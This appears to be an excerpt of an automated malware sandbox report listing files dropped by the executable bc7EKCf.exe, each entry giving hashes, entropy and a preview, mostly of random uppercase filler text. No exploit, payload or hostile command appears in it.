                                                                                                                                                                                                                                                                                                                  Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                                                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                                                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                                                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                                                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                                                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                                                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                                                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                                                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                                                                                  MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                                                                                  SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                                                                                  SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                                                                                  SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                                                                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                                                                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                                                                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                                                                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):282
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.514693737970008
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
                                                                                                                                                                                                                                                                                                                  MD5:9E36CC3537EE9EE1E3B10FA4E761045B
                                                                                                                                                                                                                                                                                                                  SHA1:7726F55012E1E26CC762C9982E7C6C54CA7BB303
                                                                                                                                                                                                                                                                                                                  SHA-256:4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
                                                                                                                                                                                                                                                                                                                  SHA-512:5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                                                                                                  MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                                                                                                  SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                                                                                                  SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                                                                                                  SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
